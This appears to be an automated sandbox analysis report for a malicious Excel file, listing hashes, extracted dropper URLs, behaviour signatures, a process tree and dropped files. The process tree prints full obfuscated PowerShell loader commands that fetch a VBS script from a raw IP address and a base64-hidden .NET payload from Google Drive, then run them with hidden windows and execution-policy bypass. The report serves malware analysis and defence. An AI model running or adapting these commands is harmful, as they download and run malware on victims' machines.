Analysis

  • max time kernel
    119s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    23-10-2024 02:01

General

  • Target

    fca38bbe2ae4512d5245a3d53392185bd425e7045c6fdd72a2928c1e5ec8e036.xls

  • Size

    869KB

  • MD5

    22100d6799cce6677b27c5adedc37555

  • SHA1

    ab6e115fb8de52dce34a26b384780c730bb1c0bf

  • SHA256

    fca38bbe2ae4512d5245a3d53392185bd425e7045c6fdd72a2928c1e5ec8e036

  • SHA512

    a78943a97ca87c20a0da4380da617ca3248399fc9b00a101886f08972696606309fa8962cc3b66ff7dd8daefb2ba20572fa5401b7764e4ee7fc25d87d7bffdcb

  • SSDEEP

    12288:1lBjmzHJE+CzldDD3DERnLRmF8DaJhuBU3LLQDC7SGooNnlix9I:TByczlVbARM8uoU3nQ4xiH

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

exe.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

Signatures

  • Blocklisted process makes network request 5 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Evasion via Device Credential Deployment 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Drops file in System32 directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\fca38bbe2ae4512d5245a3d53392185bd425e7045c6fdd72a2928c1e5ec8e036.xls
    1⤵
    • System Location Discovery: System Language Discovery
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:2636
  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe -Embedding
    1⤵
    • Blocklisted process makes network request
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:2716
    • C:\Windows\SysWOW64\WIndOwspOwerSheLl\v1.0\pOwersHElL.exe
      "C:\Windows\SyStem32\WIndOwspOwerSheLl\v1.0\pOwersHElL.exe" "poWERsHEll.eXE -eX BYPaSS -nop -W 1 -C devicEcREDeNtiaLdEpLoYmENT ; Iex($(iEx('[SYStem.TEXT.eNcODiNg]'+[CHar]58+[chAr]58+'UtF8.gEtstRINg([sYStEm.ConVErt]'+[char]58+[CHAr]58+'FrombAse64sTRinG('+[CHaR]34+'JFJ2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBZGQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJFcmRFZklOaVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUmxtT24uRGxMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdQUkNUUUdZQmxFLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbnpCLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTmUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgREN6QnZFTkl4eXYsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpemspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAienRmalYiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZVNwQWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0a0RVUk0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRSdjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjIyMC40MC84ODgvc2VlYmVzdHRoaW5nc3dpdGhncmVhdG5ld3NnaXZlbm1lLnRJRiIsIiRlTlY6QVBQREFUQVxzZWViZXN0dGhpbmdzd2l0aGdyZWF0bmV3c2dpdmVubS52YlMiLDAsMCk7U3RhclQtU2xFRVAoMyk7U1RBUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFcc2VlYmVzdHRoaW5nc3dpdGhncmVhdG5ld3NnaXZlbm0udmJTIg=='+[chAR]0X22+'))')))"
      2⤵
      • Blocklisted process makes network request
      • Evasion via Device Credential Deployment
      • Drops file in System32 directory
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1996
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX BYPaSS -nop -W 1 -C devicEcREDeNtiaLdEpLoYmENT
        3⤵
        • Evasion via Device Credential Deployment
        • Drops file in System32 directory
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2272
      • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5gr8p41s.cmdline"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1904
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
          C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF642.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCF641.tmp"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:532
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seebestthingswithgreatnewsgivenm.vbS"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1436
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdMZXhpbWFnZVVybCA9IHdMOGh0dHBzOi8vZHJpJysndmUuZ29vJysnZ2xlLmNvbS91Yz9leHBvcnQ9ZG93bmxvYWQmaWQ9MUFJVmdKSkp2MUY2dlM0c1VPeWJuSC1zRHZVaEJZd3VyIHdMODtMZXh3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O0xleGltYWdlQnl0ZXMgPSAnKydMZXh3ZScrJ2JDbGllbnQuRG93JysnbmxvYWREYXRhKExleGltYWdlVXJsKTtMZXhpbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRW5jJysnb2RpbmddOjpVVEY4LkdldFN0cmluZyhMZXhpbWFnZUJ5dGVzKTtMZXhzdGFydEYnKydsYWcgPSB3TDg8PEJBU0U2NF9TVEFSVD4+d0w4O0xleGVuZCcrJ0ZsYWcgPSB3TDg8PEJBU0U2NF9FTkQ+PndMODtMZXhzdGFydEluZGUnKyd4ID0gTGV4aW1hZ2VUZXh0LkluZGV4T2YoTGV4c3RhcnRGbGFnKTtMZXhlJysnbmRJbmRleCA9IExleGltYWdlVGV4JysndC5JbmRleE9mKExleGVuZEZsYWcpO0xleHN0YXJ0SW5kZXggLWdlIDAgLWFuZCBMZXhlJysnbmRJbmRleCAtZ3QgTGV4c3RhcnRJbmRleDtMZXhzdGFydEluZGV4ICs9ICcrJ0xleHN0YXJ0RmxhZy5MZW5ndGg7TGV4YmFzZTY0TGVuZ3RoID0gTGV4ZW5kSW5kZXggLSBMZXhzdGFydEluZGV4O0xleGJhc2U2NEMnKydvbW1hJysnbmQgPSBMZXhpbWFnZVRleHQuU3Vic3RyaW5nKCcrJ0xleHN0YXJ0SW5kZXgsIExleGJhc2U2NExlbmd0aCk7TGV4YmFzZTY0UmV2ZXJzZWQgPSAtam9pbiAoTGV4YmFzZTY0Q29tbWFuZC5Ub0NoYScrJ3JBcnJheSgpIDZNdCBGb3JFYWNoLU9iamVjdCB7IExleF8gfSlbLTEuLi0oTGV4YmFzZTY0Q29tbWFuZC5MZW5ndGgpXTtMZXhjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKExleGJhcycrJ2U2NFJldmVyc2VkKTtMZXhsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoTGV4Y29tbWFuZEJ5dGVzKTtMZXh2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TScrJ2V0aG9kKHdMOFZBSXdMOCk7TGV4dmFpTWV0aG9kLkludm9rZShMZXhudWxsLCBAKHdMOHR4dC5SRUVXUS84ODgvMDQuMDIyLjMuMjkxLy86cHR0aHdMOCwgd0w4ZGVzYXRpdmFkb3dMOCwgd0w4JysnZGVzYXRpdmFkb3dMOCwgd0w4ZGVzYXRpdmFkb3dMOCwgdycrJ0w4QWRkSW5Qcm9jZXNzMzJ3TDgsIHdMOGRlc2F0aXZhZG93TDgsIHdMOGRlc2F0aXZhZG93TDgsd0w4ZGVzYXRpdmFkb3dMOCx3TDhkZXNhdGl2YWRvd0w4LHdMOGRlJysnc2F0aXZhZG93TDgsd0w4ZGVzYXRpdmFkb3dMOCx3TDhkZXNhdGl2JysnYWRvd0w4LHdMODF3TDgnKycsd0w4ZGVzJysnYXRpdmFkb3dMOCkpOycpLnJFcGxhY2UoJ0xleCcsW1NUcmluZ11bQ0hBUl0zNikuckVwbGFjZSgoW0NIQVJdMTE5K1tDSEFSXTc2K1tDSEFSXTU2KSxbU1RyaW5nXVtDSEFSXTM5KS5yRXBsYWNlKChbQ0hBUl01NCtbQ0hBUl03NytbQ0hBUl0xMTYpLCd8JykgfCBpRXg=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Drops file in System32 directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2796
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('LeximageUrl = wL8https://dri'+'ve.goo'+'gle.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur wL8;LexwebClient = New-Object System.Net.WebClient;LeximageBytes = '+'Lexwe'+'bClient.Dow'+'nloadData(LeximageUrl);LeximageText = [System.Text.Enc'+'oding]::UTF8.GetString(LeximageBytes);LexstartF'+'lag = wL8<<BASE64_START>>wL8;Lexend'+'Flag = wL8<<BASE64_END>>wL8;LexstartInde'+'x = LeximageText.IndexOf(LexstartFlag);Lexe'+'ndIndex = LeximageTex'+'t.IndexOf(LexendFlag);LexstartIndex -ge 0 -and Lexe'+'ndIndex -gt LexstartIndex;LexstartIndex += '+'LexstartFlag.Length;Lexbase64Length = LexendIndex - LexstartIndex;Lexbase64C'+'omma'+'nd = LeximageText.Substring('+'LexstartIndex, Lexbase64Length);Lexbase64Reversed = -join (Lexbase64Command.ToCha'+'rArray() 6Mt ForEach-Object { Lex_ })[-1..-(Lexbase64Command.Length)];LexcommandBytes = [System.Convert]::FromBase64String(Lexbas'+'e64Reversed);LexloadedAssembly = [System.Reflection.Assembly]::Load(LexcommandBytes);LexvaiMethod = [dnlib.IO.Home].GetM'+'ethod(wL8VAIwL8);LexvaiMethod.Invoke(Lexnull, @(wL8txt.REEWQ/888/04.022.3.291//:ptthwL8, wL8desativadowL8, wL8'+'desativadowL8, wL8desativadowL8, w'+'L8AddInProcess32wL8, wL8desativadowL8, wL8desativadowL8,wL8desativadowL8,wL8desativadowL8,wL8de'+'sativadowL8,wL8desativadowL8,wL8desativ'+'adowL8,wL81wL8'+',wL8des'+'ativadowL8));').rEplace('Lex',[STring][CHAR]36).rEplace(([CHAR]119+[CHAR]76+[CHAR]56),[STring][CHAR]39).rEplace(([CHAR]54+[CHAR]77+[CHAR]116),'|') | iEx"
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Drops file in System32 directory
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2124

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12

    Filesize

    1KB

    MD5

    67e486b2f148a3fca863728242b6273e

    SHA1

    452a84c183d7ea5b7c015b597e94af8eef66d44a

    SHA256

    facaf1c3a4bf232abce19a2d534e495b0d3adc7dbe3797d336249aa6f70adcfb

    SHA512

    d3a37da3bb10a9736dc03e8b2b49baceef5d73c026e2077b8ebc1b786f2c9b2f807e0aa13a5866cf3b3cafd2bc506242ef139c423eaffb050bbb87773e53881e

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8

    Filesize

    436B

    MD5

    971c514f84bba0785f80aa1c23edfd79

    SHA1

    732acea710a87530c6b08ecdf32a110d254a54c8

    SHA256

    f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895

    SHA512

    43dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12

    Filesize

    174B

    MD5

    5e2047573ac817ab0283119280611f90

    SHA1

    811cdac2b481601b0b0181033ce66a24b6f2fc04

    SHA256

    5be9b8bec7b3d1c109b35f10e7876ed347a49e95980d672bb32badb90c4048e3

    SHA512

    a38dda9736f561dfd1c43da562aa3f6599eaa75b6369ad1cb07a6ece6dceeee6cf406924b96f7be8a079b41adffb3209c87512219319b310650bac59beaac970

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    c78c9a382f06cb0e561e05a04b24f7ea

    SHA1

    69726e66f98aed18a788436656e8100ab18cb5c5

    SHA256

    12bbcaaf147b1e4906333e1891d80d86b6dadab3ff980955ecca43a115638189

    SHA512

    82c599756171c58cdde96b3f3a4ca3bbf9e20ce4d0053a30cbbe9f0577a3356b5a15fc78f75b44e111e318c1595c82b1c62b3f83e23451de1cfb4a1c65b9a90d

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8

    Filesize

    170B

    MD5

    b7c748863630f3322c7d90b4413d6574

    SHA1

    8e2c65af301dbdb2bbb2a1cee6e99bcc29832d8c

    SHA256

    b15ae76686a20b35e8c46387c946466a4ffdc8b6460d0ffacf7f6767a5cfa6e9

    SHA512

    2faa90fbdc44752a8f2e9bf8d2f6660b4235d622dda3d1576543ff05afeaa59e2da66b8a569c479b54be16833fdd61f59ba6e4dfe12980571caf39a4c3beb2a5

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\WCATT3E5\sheisthebestcaseeveryoneknowbesththignstobegreatfor[1].hta

    Filesize

    8KB

    MD5

    3ee7595d1046aa4f628cd9c20809d46a

    SHA1

    267aad6b4b26b2c84a6560da6cb9a56dfb66628f

    SHA256

    e6612e1ba538b9b961d1ce8cdbd53085b1f57845da405350f8af214be9cb8d02

    SHA512

    a90b5e595900e3dce559a2d3fdffbc92c9beeb281483ea6d0e6ae081ceb7d2239330dbf0c1da01ba35768f86ca7b15ab1937de3a1298d4c23e72a8c13a5d93eb

  • C:\Users\Admin\AppData\Local\Temp\5gr8p41s.dll

    Filesize

    3KB

    MD5

    d0fa91d43ac6fa1adb4b6e0507e5633b

    SHA1

    83f1e9504ec06804c32f80fad4b2199d47aa1cc2

    SHA256

    9c34dd1141fc376b14ce3304803c499cd52cb32107cf3acab6e7b99879cade70

    SHA512

    3c2cbca12134098000ab03e7229ffe23747eec16839af44f775eae49573f5e3a489b52cdb74c4a7433df3fec1e8b0cbd342f9914a6d2ca5f438b57f74958dc8a

  • C:\Users\Admin\AppData\Local\Temp\5gr8p41s.pdb

    Filesize

    7KB

    MD5

    e6c322d5b243edc2175ec5693149490d

    SHA1

    04e42a702e0cb090dc91a8d51b21c9ecda5a5575

    SHA256

    f43d81164807f7731901a7912f1a44fdc19b89b00d1d47d6c91085e480bf5c3f

    SHA512

    90485103b8b7cf9d60fecdf6261aad4a2ab9c918bf32ce4b4dc0815858e03fdfc447b18e96c73bc0a1476cbaf1fb1cc99f458efd72361f74984c84eb80a4a7a6

  • C:\Users\Admin\AppData\Local\Temp\CabEE84.tmp

    Filesize

    70KB

    MD5

    49aebf8cbd62d92ac215b2923fb1b9f5

    SHA1

    1723be06719828dda65ad804298d0431f6aff976

    SHA256

    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

    SHA512

    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

  • C:\Users\Admin\AppData\Local\Temp\RESF642.tmp

    Filesize

    1KB

    MD5

    8060a4a1f432d6d236403bd8a740c37f

    SHA1

    e18185f535490738620e69791fe368e1605ec94e

    SHA256

    109f05a236ed75069e31e9be21a246d96422317b26fdee9f86f8c406e65b6566

    SHA512

    da73503c02d44d6b2f34c9b682776e7669554371ea13529d6cb9bc12a63efdb6a9b155ed7953c73c680353cbdae6ce5da6a208676f70de8d212bd55b6c64356c

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    Filesize

    7KB

    MD5

    02cd37993e81b4fc821aee6fd49ce8d6

    SHA1

    f08c4c6f2a0b3d816b08d3484c1aa7b9c26bdf79

    SHA256

    69ef07dd7949117fa82b5b197634e44d70a4b7952a22426dc57f58681ebe98da

    SHA512

    c78350f1f6dd9d5ce7626234bfd08affa93dfca18fbc2720a95c1e40e0071c1274e683f3eca0ccb6d841cb5d3d88b61e91c673947da596381c5f1775bfe81108

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    Filesize

    7KB

    MD5

    2f0e58d7a20739bf2aa018b0cde85583

    SHA1

    85f1714c5b86fd7994fe53051732215c1aa56563

    SHA256

    34dbf1229414375fc427276cfb25fc6c9f637a717ba78fd1ce5b2955c63b29fd

    SHA512

    d96884ccef325b155d96fa99841c5f6d19e4b238f0ed8263a2276df679136dd69cdf8fbd572a6173df084d3ab492b0d5610a5f4c6c3b7d855c8fb3bd280d6143

  • C:\Users\Admin\AppData\Roaming\seebestthingswithgreatnewsgivenm.vbS

    Filesize

    191KB

    MD5

    3b2dfe853b29b8f7c863a177c77b2e0a

    SHA1

    f15bcc4bab2d0f9d84c6e09947982d86c9719524

    SHA256

    605997c72f3ef670c71c934cbb9b9b989fb83be8e7e9303df63695ecbaca4d1e

    SHA512

    d32da36c3c5ba33b840f8a99e5c8a13df9761e6b84c7b11c1d91e2eabeb478d564ea9801f36a5099741a90bf19ac0f83e445a46d94192693eeb5cc55635557ff

  • \??\c:\Users\Admin\AppData\Local\Temp\5gr8p41s.0.cs

    Filesize

    472B

    MD5

    ebe44eb3851718dda661ef08a5ae1f72

    SHA1

    fc84762887e0b10691ab43cb52f59169096936ec

    SHA256

    3c667a3bd30fef3aa5caf37fb56f20687efa429605d0412bad70f15890e9e6d4

    SHA512

    99a0db30aac98a290b73db9bfd3a5aa7f1aba22e5e2dcf2e73b5749f8ddcc01d4520d47b428f647ef622bfd893962c5efc55237b3cd5b2a95c186ecb41d7256e

  • \??\c:\Users\Admin\AppData\Local\Temp\5gr8p41s.cmdline

    Filesize

    309B

    MD5

    60ab982007366b19a2d59e855d0daacc

    SHA1

    3982100063f28e268bac0f7981a131e26bd30359

    SHA256

    558cb673cb4eb393a5ce240a9806c5a93b00b93ab5f5c3ac4699c84bdcdea6bc

    SHA512

    d973b0ba462bbc4d56b78a97269e4437063ecf923c70961f280cfd9160462d2c21098138d03eaeee34ff5213fcc93c5a4169a2d15f796a0d6228d6aa94172039

  • \??\c:\Users\Admin\AppData\Local\Temp\CSCF641.tmp

    Filesize

    652B

    MD5

    694498730543757047c41b5622905b55

    SHA1

    e1ef0383f7d217e2898893e24c6dfce764e11260

    SHA256

    e658f11da16ee7420a2685dcfa2561139205ad5d0af5cbc3e0c36bde92951b70

    SHA512

    2cce7418918c9831cf3e4c2a11b1f40cfda5224c43a12f6de8401cf9c7f109fe29b38f61181550c0114543626adf989f8cfd8ad7bee38e04d751fd6b61bb1cb0

  • memory/2636-20-0x0000000002E00000-0x0000000002E02000-memory.dmp

    Filesize

    8KB

  • memory/2636-1-0x000000007276D000-0x0000000072778000-memory.dmp

    Filesize

    44KB

  • memory/2636-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB

  • memory/2636-78-0x000000007276D000-0x0000000072778000-memory.dmp

    Filesize

    44KB

  • memory/2716-19-0x0000000002930000-0x0000000002932000-memory.dmp

    Filesize

    8KB